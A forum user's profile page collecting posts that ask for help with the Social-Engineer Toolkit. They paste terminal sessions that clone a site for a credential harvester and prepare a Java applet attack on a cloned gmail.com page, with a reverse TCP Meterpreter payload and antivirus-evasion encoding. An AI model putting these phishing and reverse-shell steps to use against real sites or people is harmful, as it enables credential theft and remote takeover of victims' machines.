Shinigami's Achievements



  1. I actually tried that, even tried reloading an older release via VMWARE snapshot. Doesn't help.
  2. 1) Web Templates
     2) Site Cloner
     3) Custom Import
     99) Return to Webattack Menu

     set:webattack>2
     [-] Credential harvester will allow you to utilize the clone capabilities within SET
     [-] to harvest credentials or parameters from a website as well as place them into a report
     [-] This option is used for what IP the server will POST to.
     [-] If you're using an external IP, use your external IP for this
     set:webattack> IP address for the POST back in Harvester/Tabnabbing:***********
     [-] SET supports both HTTP and HTTPS
     [-] Example: http://www.thisisafakesite.com
     set:webattack> Enter the url to clone:https://*****.com

     [*] Cloning the website: https://*****.com
     [*] This could take a little bit...

     The best way to use this attack is if username and password form
     fields are available. Regardless, this captures all POSTs on a website.
     [*] I have read the above message.
     [*] Press {return} to continue.

     [*] Social-Engineer Toolkit Credential Harvester Attack
     [*] Credential Harvester is running on port *****
     [*] Information will be displayed to you as it arrives below:
     localhost - - [29/Jun/2012 13:39:44] "GET / HTTP/1.1" 200 -

     Problem is, the CLONED_SITE is BLANK. Locating the INDEX.HTML file in the WEB_CLONE folder, it's BLANK. I'm not sure why this is happening. It worked perfectly until yesterday. I deleted the PROGRAM_JUNK data, also reloaded an old Snapshot of SET, and I still have this issue.

     It DOES connect to the internet to clone the specified Site, but the cloned_site is just EMPTY/BLANK. I did try plenty of other sites to clone. They all take a while in cloning from the Internet, and smoothly proceed with listening to incoming connections, but the Index is empty.

     Could it be a bug in the Update?
  3. Thank you! Very grateful for your response, very elaborate. Can you please explain the SECOND query I posted? Concerning the code where it asks if my Metasploit is running on the same IP or a different one. Should I use my Local IP here or Public again? Thanks again.
  4. Hi, before I pose my query, I would like to introduce myself. I'm a CEH and ECSA for quite some time now. However I'm still learning and today I was just curious in understanding the routing on how SET is connected to the MSF.

     Question: To make things simple I'm copying the lines from the Terminal and I'll point out what I'm referring to.

     Setting up JavaApplet in S.E.T:

     1) Java Applet Attack Method
     set:webattack>1
     2) Site Cloner
     set:webattack>2
     [-] NAT/Port Forwarding can be used in the cases where your SET machine is
     [-] not externally exposed and may be a different IP address than your reverse listener.
     set> Are you using NAT/Port Forwarding [yes|no]: y
     #####set:webattack> IP address to SET web server (this could be your external IP or hostname):***.***.***.***######
     #####set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:n#######
     [-] SET supports both HTTP and HTTPS
     [-] Example: http://www.thisisafakesite.com
     set:webattack> Enter the url to clone:https://gmail.com

     [*] Cloning the website: https://gmail.com
     [*] Malicious java applet website prepped for deployment

     What payload do you want to generate:

     Name: Description:
     1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
     2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
     set:payloads>2

     Below is a list of encodings to try and bypass AV.
     Select one of the below, 'backdoored executable' is typically the best.
     1) avoid_utf8_tolower (Normal)
     16) Backdoored Executable (BEST)
     set:encoding>16
     #####set:payloads> PORT of the listener [443]:#####
     [*] Generating x64-based powershell injection code...

     FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or other DNS instead of an IP Address here? For I have a Dynamic IP issue here. Since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS.

     SECOND: The Second line of code following, I seriously don't understand this. If I put in a Local Static IP address in this field (after choosing 'yes'), would that make a difference? What would be the 'Correct' option if I were to practice this over the Internet? Would I use the PUBLIC-IP/DNS just like I used it for the option Before this one? & why would it ask for my HANDLER's IP when it generates its own Handler? Please elaborate on this option, thank you.

     THIRD: The last HASHED line that asks for a PORT, if I'm not wrong, this is the HANDLER's port?

     LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester alongside when they both are on different ports?

     Thank you